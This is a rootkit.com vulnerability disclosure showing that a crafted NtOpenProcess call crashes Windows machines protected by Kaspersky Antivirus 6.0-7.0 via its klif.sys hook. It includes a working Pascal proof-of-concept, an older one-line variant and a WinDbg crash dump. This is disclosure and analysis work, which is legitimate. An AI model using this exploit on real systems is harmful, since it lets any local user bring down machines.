Exploiting Kaspersky Antivirus 6.0-7.0

The reasons why we decided to post this material on rootkit.com is simple:

Well-known and really good Kaspersky Antivirus very long time suffers from very dangerous bug, which can be used as exploit and crash system protected by this antivirus down even from Guest account.
All attempts to inform Kaspersky Lab about this vulnerability was ignored. This material was posted some years ago, and in the last summer we posted new exploit for Kaspersky AV 6.0 which was based on previously discovered by Ms-Rem security hole. And nothing was changed. Even now with upcoming Kaspersky Antivirus 7.0 this exploit works very well.
The main goal of this exploit is calling NtOpenProcess with invalid parameters. This function is hooked by Kaspersky driver called klif.sys and reasons of its interception is obvious - this was made to protect Kaspersky AV from unauthorized access and closing by malware.

Here is prototype of this function

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
               IN ACCESS_MASK DesiredAccess,
               IN POBJECT_ATTRIBUTES ObjectAttributes,
               IN PCLIENT_ID ClientId OPTIONAL );


Here is a small exploit coded in pascal (worked well with klif.sys version 6.12.10.280 and previous versions)


var
  ob1: OBJECT_ATTRIBUTES;
  p1: DWORD;
begin
  ob1.Length := sizeof(ob1);
  NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;


As you see last parameter is CLIENT_ID structure - address and its points to invalid random memory region in kernel.
After starting this exploit on clean Windows XP, without KAV - no BSOD appears.
After starting this exploit on Windows XP protected by KAV 7.0 - we are getting immediately BSOD - PAGE_FAULT_IN_NONPAGED_AREA

Why this happened? Very simple explanation. The source of Hook on NtOpenProcess, I guess, looks like this:


NTSTATUS NewNtOpenProcess (
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
    __try
   {

     if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

    else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
                                  ObjectAttributes, ClientId);
   __except (EXCEPTION_EXECUTE_HANDLER)
   {
      ... stuff here ...
   }
}


The biggest mistake here is ClientId->UniqueProcess, since ClientId is a POINTER to structure. Accessing to invalid memory region causes immediately PAGE_FAULT_IN_NONPAGED_AREA.
Originally exploit was created by Ms-Rem and looks like


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);


Now as you see KAV developers have used try/except block, but as shows they don't know about MmIsAddressValid.

Hope now developers of Kaspersky Antivirus will discover for themself wonderful program called - NtCall and fix this bug.


*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP:  46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08          movsx   ecx,byte ptr [eax]

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  WRONG_SYMBOLS

BUGCHECK_STR:  0x50

LAST_CONTROL_TRANSFER:  from f941b39a to f941840c

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND:  kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08          movsx   ecx,byte ptr [eax]

SYMBOL_STACK_INDEX:  0

FOLLOWUP_NAME:  MachineOwner

IMAGE_NAME:  klif.sys

SYMBOL_NAME:  klif+1940c

BUCKET_ID:  WRONG_SYMBOLS

Followup: MachineOwner


Kind Regards,
EP_X0FF/UG North

read comments (29) / write comment

recent comments:

Library	z01b	09.Jul:08:29
Lame!	assarbad	30.Jun:20:24
Not just a benign exploit	c4p0ne	13.Jun:19:21
MmIsAddressValid	deroko	11.Jun:13:25
NtCall Program?	g4m3cub3	09.Jun:11:32

. . .

views: 15000   printer-friendly version